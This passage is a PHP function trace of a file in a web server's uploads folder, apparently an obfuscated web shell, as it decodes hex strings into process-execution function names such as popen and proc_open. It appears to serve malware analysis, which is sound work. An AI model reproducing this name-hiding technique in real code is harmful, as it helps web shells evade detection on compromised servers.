3	1481	1	0.055037	722576
3	1481	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1482	0	0.055068	722600	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1482	1	0.055079	722648
3	1482	R			101
3	1483	0	0.055092	722568	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1483	1	0.055103	722608
3	1483	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1484	0	0.055134	722600	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1484	1	0.055150	722648
3	1484	R			97
3	1485	0	0.055162	722568	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1485	1	0.055174	722608
3	1485	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1486	0	0.055204	722600	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1486	1	0.055215	722648
3	1486	R			100
3	1487	0	0.055227	722568	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1487	1	0.055238	722608
3	1487	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1488	0	0.055269	722600	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1488	1	0.055281	722648
3	1488	R			101
3	1489	0	0.055293	722568	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1489	1	0.055304	722608
3	1489	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1490	0	0.055334	722600	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1490	1	0.055346	722648
3	1490	R			114
3	1491	0	0.055358	722568	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1491	1	0.055370	722608
3	1491	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1479	1	0.055400	722568
2	1479	R			'header'
1		A						/var/www/html/uploads/1CTT.php	7	$func[75] = 'header'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1492	0	0.055434	722568	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'706f70656e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1493	0	0.055474	722600	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1493	1	0.055486	722648
3	1493	R			112
3	1494	0	0.055499	722568	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1494	1	0.055510	722608
3	1494	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1495	0	0.055541	722632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1495	1	0.055552	722680
3	1495	R			111
3	1496	0	0.055565	722600	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1496	1	0.055576	722640
3	1496	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1497	0	0.055607	722632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1497	1	0.055619	722680
3	1497	R			112
3	1498	0	0.055631	722600	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1498	1	0.055643	722640
3	1498	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1499	0	0.055673	722632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1499	1	0.055685	722680
3	1499	R			101
3	1500	0	0.055697	722600	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1500	1	0.055708	722640
3	1500	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1501	0	0.055738	722632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1501	1	0.055750	722680
3	1501	R			110
3	1502	0	0.055762	722600	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1502	1	0.055774	722640
3	1502	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1492	1	0.055804	722600
2	1492	R			'popen'
1		A						/var/www/html/uploads/1CTT.php	7	$func[76] = 'popen'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1503	0	0.055837	722600	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'69735f7265736f75726365'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 21
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1504	0	0.055882	722632	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1504	1	0.055894	722680
3	1504	R			105
3	1505	0	0.055906	722600	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1505	1	0.055934	722640
3	1505	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1506	0	0.055968	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1506	1	0.055980	722712
3	1506	R			115
3	1507	0	0.055992	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1507	1	0.056004	722672
3	1507	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1508	0	0.056034	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1508	1	0.056046	722712
3	1508	R			95
3	1509	0	0.056058	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1509	1	0.056070	722672
3	1509	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1510	0	0.056101	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1510	1	0.056112	722712
3	1510	R			114
3	1511	0	0.056124	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1511	1	0.056136	722672
3	1511	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1512	0	0.056166	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1512	1	0.056178	722712
3	1512	R			101
3	1513	0	0.056190	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1513	1	0.056201	722672
3	1513	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1514	0	0.056231	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1514	1	0.056242	722712
3	1514	R			115
3	1515	0	0.056255	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1515	1	0.056266	722672
3	1515	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1516	0	0.056296	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1516	1	0.056308	722712
3	1516	R			111
3	1517	0	0.056320	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1517	1	0.056330	722672
3	1517	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1518	0	0.056360	722664	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1518	1	0.056372	722712
3	1518	R			117
3	1519	0	0.056384	722632	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1519	1	0.056395	722672
3	1519	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1520	0	0.056426	722672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1520	1	0.056437	722720
3	1520	R			114
3	1521	0	0.056449	722640	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1521	1	0.056460	722680
3	1521	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1522	0	0.056490	722672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1522	1	0.056502	722720
3	1522	R			99
3	1523	0	0.056514	722640	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1523	1	0.056525	722680
3	1523	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1524	0	0.056555	722672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1524	1	0.056567	722720
3	1524	R			101
3	1525	0	0.056579	722640	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1525	1	0.056590	722680
3	1525	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1503	1	0.056625	722640
2	1503	R			'is_resource'
1		A						/var/www/html/uploads/1CTT.php	7	$func[77] = 'is_resource'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1526	0	0.056659	722640	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66656f66'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1527	0	0.056700	722672	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1527	1	0.056712	722720
3	1527	R			102
3	1528	0	0.056725	722640	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1528	1	0.056736	722680
3	1528	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1529	0	0.056766	722704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1529	1	0.056778	722752
3	1529	R			101
3	1530	0	0.056790	722672	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1530	1	0.056801	722712
3	1530	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1531	0	0.056831	722704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1531	1	0.056843	722752
3	1531	R			111
3	1532	0	0.056856	722672	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1532	1	0.056867	722712
3	1532	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1533	0	0.056896	722704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1533	1	0.056908	722752
3	1533	R			102
3	1534	0	0.056920	722672	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1534	1	0.056931	722712
3	1534	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1526	1	0.056961	722672
2	1526	R			'feof'
1		A						/var/www/html/uploads/1CTT.php	7	$func[78] = 'feof'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1535	0	0.056994	722672	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6672656164'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1536	0	0.057034	722704	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1536	1	0.057046	722752
3	1536	R			102
3	1537	0	0.057059	722672	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1537	1	0.057070	722712
3	1537	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1538	0	0.057100	722736	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1538	1	0.057112	722784
3	1538	R			114
3	1539	0	0.057124	722704	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1539	1	0.057136	722744
3	1539	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1540	0	0.057166	722736	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1540	1	0.057177	722784
3	1540	R			101
3	1541	0	0.057189	722704	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1541	1	0.057200	722744
3	1541	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1542	0	0.057230	722736	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1542	1	0.057242	722784
3	1542	R			97
3	1543	0	0.057255	722704	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1543	1	0.057266	722744
3	1543	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1544	0	0.057295	722736	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1544	1	0.057306	722784
3	1544	R			100
3	1545	0	0.057323	722704	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1545	1	0.057335	722744
3	1545	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1535	1	0.057365	722704
2	1535	R			'fread'
1		A						/var/www/html/uploads/1CTT.php	7	$func[79] = 'fread'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1546	0	0.057398	722704	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'70636c6f7365'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1547	0	0.057439	722736	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1547	1	0.057450	722784
3	1547	R			112
3	1548	0	0.057463	722704	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1548	1	0.057474	722744
3	1548	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1549	0	0.057505	722768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1549	1	0.057516	722816
3	1549	R			99
3	1550	0	0.057529	722736	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1550	1	0.057540	722776
3	1550	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1551	0	0.057570	722768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1551	1	0.057582	722816
3	1551	R			108
3	1552	0	0.057594	722736	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1552	1	0.057606	722776
3	1552	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1553	0	0.057636	722768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1553	1	0.057647	722816
3	1553	R			111
3	1554	0	0.057660	722736	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1554	1	0.057671	722776
3	1554	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1555	0	0.057701	722768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1555	1	0.057713	722816
3	1555	R			115
3	1556	0	0.057725	722736	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1556	1	0.057736	722776
3	1556	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1557	0	0.057766	722768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1557	1	0.057778	722816
3	1557	R			101
3	1558	0	0.057790	722736	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1558	1	0.057801	722776
3	1558	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1546	1	0.057831	722736
2	1546	R			'pclose'
1		A						/var/www/html/uploads/1CTT.php	7	$func[80] = 'pclose'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1559	0	0.057865	722736	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'70726f635f6f70656e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1560	0	0.057906	722768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1560	1	0.057918	722816
3	1560	R			112
3	1561	0	0.057930	722736	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1561	1	0.057942	722776
3	1561	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1562	0	0.057972	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1562	1	0.057984	722848
3	1562	R			114
3	1563	0	0.057996	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1563	1	0.058008	722808
3	1563	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1564	0	0.058043	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1564	1	0.058055	722848
3	1564	R			111
3	1565	0	0.058067	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1565	1	0.058079	722808
3	1565	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1566	0	0.058109	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1566	1	0.058120	722848
3	1566	R			99
3	1567	0	0.058133	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1567	1	0.058144	722808
3	1567	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1568	0	0.058174	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1568	1	0.058186	722848
3	1568	R			95
3	1569	0	0.058198	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1569	1	0.058210	722808
3	1569	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1570	0	0.058240	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1570	1	0.058251	722848
3	1570	R			111
3	1571	0	0.058263	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1571	1	0.058275	722808
3	1571	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1572	0	0.058304	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1572	1	0.058316	722848
3	1572	R			112
3	1573	0	0.058328	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1573	1	0.058339	722808
3	1573	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1574	0	0.058369	722800	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1574	1	0.058381	722848
3	1574	R			101
3	1575	0	0.058394	722768	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1575	1	0.058405	722808
3	1575	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1576	0	0.058435	722808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1576	1	0.058447	722856
3	1576	R			110
3	1577	0	0.058459	722776	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1577	1	0.058470	722816
3	1577	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1559	1	0.058500	722776
2	1559	R			'proc_open'
1		A						/var/www/html/uploads/1CTT.php	7	$func[81] = 'proc_open'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1578	0	0.058534	722776	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'73747265616d5f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 37
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1579	0	0.058577	722808	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1579	1	0.058589	722856
3	1579	R			115
3	1580	0	0.058601	722776	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1580	1	0.058619	722816
3	1580	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1581	0	0.058654	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1581	1	0.058666	722888
3	1581	R			116
3	1582	0	0.058679	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1582	1	0.058690	722848
3	1582	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1583	0	0.058721	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1583	1	0.058732	722888
3	1583	R			114
3	1584	0	0.058744	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1584	1	0.058759	722848
3	1584	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1585	0	0.058789	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1585	1	0.058801	722888
3	1585	R			101
3	1586	0	0.058813	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1586	1	0.058825	722848
3	1586	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1587	0	0.058855	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1587	1	0.058867	722888
3	1587	R			97
3	1588	0	0.058879	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1588	1	0.058890	722848
3	1588	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1589	0	0.058920	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1589	1	0.058932	722888
3	1589	R			109
3	1590	0	0.058945	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1590	1	0.058955	722848
3	1590	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1591	0	0.058988	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1591	1	0.059000	722888
3	1591	R			95
3	1592	0	0.059028	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1592	1	0.059040	722848
3	1592	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1593	0	0.059071	722840	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	1593	1	0.059083	722888
3	1593	R			103
3	1594	0	0.059095	722808	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	1594	1	0.059107	722848
3	1594	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1595	0	0.059137	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1595	1	0.059149	722896
3	1595	R			101
3	1596	0	0.059161	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1596	1	0.059173	722856
3	1596	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1597	0	0.059203	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1597	1	0.059215	722896
3	1597	R			116
3	1598	0	0.059227	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1598	1	0.059238	722856
3	1598	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1599	0	0.059268	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1599	1	0.059280	722896
3	1599	R			95
3	1600	0	0.059292	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1600	1	0.059302	722856
3	1600	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1601	0	0.059333	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1601	1	0.059344	722896
3	1601	R			99
3	1602	0	0.059357	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1602	1	0.059368	722856
3	1602	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1603	0	0.059398	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1603	1	0.059409	722896
3	1603	R			111
3	1604	0	0.059422	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1604	1	0.059434	722856
3	1604	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1605	0	0.059464	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1605	1	0.059475	722896
3	1605	R			110
3	1606	0	0.059488	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1606	1	0.059503	722856
3	1606	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1607	0	0.059534	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1607	1	0.059546	722896
3	1607	R			116
3	1608	0	0.059558	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1608	1	0.059569	722856
3	1608	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1609	0	0.059598	722848	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1609	1	0.059609	722896
3	1609	R			101
3	1610	0	0.059622	722816	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1610	1	0.059633	722856
3	1610	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1611	0	0.059663	722856	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1611	1	0.059674	722904
3	1611	R			110
3	1612	0	0.059687	722824	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1612	1	0.059698	722864
3	1612	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1613	0	0.059728	722856	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1613	1	0.059740	722904
3	1613	R			116
3	1614	0	0.059752	722824	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1614	1	0.059764	722864
3	1614	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1615	0	0.059793	722856	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1615	1	0.059804	722904
3	1615	R			115
3	1616	0	0.059816	722824	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1616	1	0.059827	722864
3	1616	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1578	1	0.059857	722824
2	1578	R			'stream_get_contents'
1		A						/var/www/html/uploads/1CTT.php	7	$func[82] = 'stream_get_contents'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
